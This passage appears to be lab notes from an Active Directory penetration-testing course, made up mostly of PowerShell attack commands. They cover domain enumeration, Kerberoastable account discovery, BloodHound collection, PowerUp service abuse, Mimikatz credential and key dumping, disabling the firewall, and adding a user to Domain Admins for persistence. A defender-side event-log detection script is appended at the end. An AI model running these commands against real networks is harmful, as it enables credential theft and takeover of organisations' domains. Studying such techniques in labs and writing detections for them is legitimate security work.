```powershell
# Users
Get-NetUser
# To list a specific property of all the users, say, samaccountname
Get-ADUser -Filter * | Select -ExpandProperty samaccountname

# Computers
Get-NetComputer
# Now, to enumerate member computers in the domain we can use Get-ADComputer
Get-ADComputer -Filter * | select -expand name

# Domain admin
Get-NetDomain
# To see attributes of the Domain Admins group
Get-ADGroup -Identity 'Domain Admins' -Properties *
# See attributes of the Domain Admins group
Get-NetGroup -GroupName "Domain Admins" -FullData
# To enumerate members of the Domain Admins group
Get-ADGroupMember -Identity 'Domain Admins'
# Get members of the Domain Admins group
Get-NetGroupMember -GroupName "Domain Admins"
# To enumerate members of the Enterprise Admins group:
Get-ADGroupMember -Identity 'Enterprise Admins' -Server techcorp.local

# Forest
Get-NetDomainTrust
Get-NetForestDomain | Get-NetDomainTrust
# If bidirectional
Get-NetForestDomain -Forest eurocorp.local -Verbose | Get-NetDomainTrust

# Kerberoastable users
Get-NetUser -SPN

# BloodHound
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All,LoggedOn

# SQL
Import-Module .\PowerUpSQL.psd1
Get-SQLInstanceDomain
```
3. Domain Admin Priv Esc
NOTE: Once you are a local administrator, run PowerShell as Administrator.
```powershell
# PowerUp
Invoke-AllChecks
# Abusing services
Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName 'dcorp\student21'
# Run mimikatz
Invoke-Mimikatz
```
4. Domain Admin Priv Esc
```powershell
# Local admin user
Find-LocalAdminAccess -Verbose
Invoke-UserHunter -CheckAccess -Verbose

# Enter session
$sess = New-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local
$sess
Enter-PSSession -Session $sess

# Language mode
$ExecutionContext.SessionState.LanguageMode

# AppLocker
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

# Disable firewall !!!

# Mimikatz
# Modify to make it work without dot sourcing: wget or curl or iex(iwr)
.\Invoke-Mimikatz.ps1
```
5. Domain Admin Persistence
```powershell
Invoke-Mimikatz
# Note the RC4 key
Invoke-Mimikatz -Command '"sekurlsa::ekeys"'
Invoke-Mimikatz -Command '"token::elevate" "vault::cred /patch"'
```
Extras
```powershell
# Once you are DA, add user to DA group
Invoke-Command -ScriptBlock {net group "DOMAIN ADMINS" student21 /domain /add} -ComputerName dcorp-dc.dollarcorp.moneycorp.local
```

```
C:> net localgroup Administrators student21 /add
C:> net localgroup "Remote Desktop Users" student21 /add
```
https://docs.microsoft.com/en-us/sysinternals/downloads/psexec

```powershell
net localgroup administrators
# Add to local Administrators group
net localgroup Administrators student21 /add
# Add to RDP group
net localgroup "Remote Desktop Users" student21 /add
# Add to DA
net group "DOMAIN ADMINS" student21 /domain /add

# Checking first-degree object controls
# If the user is part of a group (for example, SQL admins) and has GenericAll access, we can do the following
net group "SQLMANAGERS" examAd /domain /add
```
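The group additions above leave a clear trail in the Security log. As an added defender-side example (not part of the original notes), this PowerShell snippet pulls group-membership-change events and flags additions to the privileged groups named on this page. It assumes an elevated session on the DC or host being checked and that "Audit Security Group Management" is enabled; `$WatchGroups` and the seven-day window are assumptions you can adjust.

```powershell
# Added example: report members added to sensitive groups in the last 7 days.
# Event IDs: 4728 = member added to a security-enabled global group (e.g. Domain Admins),
#            4732 = member added to a security-enabled local group (e.g. Administrators, Remote Desktop Users),
#            4756 = member added to a security-enabled universal group (e.g. Enterprise Admins).
# Assumes: elevated session, and "Audit Security Group Management" enabled on the host.
$WatchGroups = @('Domain Admins', 'Enterprise Admins', 'Administrators', 'Remote Desktop Users')
$Since       = (Get-Date).AddDays(-7)

function Get-EventDataValue {
    # Read a named <Data Name="..."> field from the event XML (more robust than positional Properties[n]).
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Event, [string]$Name)
    $xml = [xml]$Event.ToXml()
    ($xml.Event.EventData.Data | Where-Object { $_.Name -eq $Name }).'#text'
}

$events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4728, 4732, 4756; StartTime = $Since } -ErrorAction SilentlyContinue

foreach ($e in $events) {
    $group = Get-EventDataValue -Event $e -Name 'TargetUserName'   # the group that was modified
    if ($WatchGroups -notcontains $group) { continue }
    [pscustomobject]@{
        Time       = $e.TimeCreated
        EventId    = $e.Id
        Group      = $group
        MemberSid  = Get-EventDataValue -Event $e -Name 'MemberSid'
        MemberName = Get-EventDataValue -Event $e -Name 'MemberName'   # DN of the added account; often '-' for local groups
        AddedBy    = '{0}\{1}' -f (Get-EventDataValue -Event $e -Name 'SubjectDomainName'), (Get-EventDataValue -Event $e -Name 'SubjectUserName')
        Computer   = $e.MachineName
    }
}
```

Resolve `MemberSid` with `Get-ADUser -Identity <SID>` when `MemberName` is `-`, and forward these events to your SIEM rather than relying on ad-hoc queries.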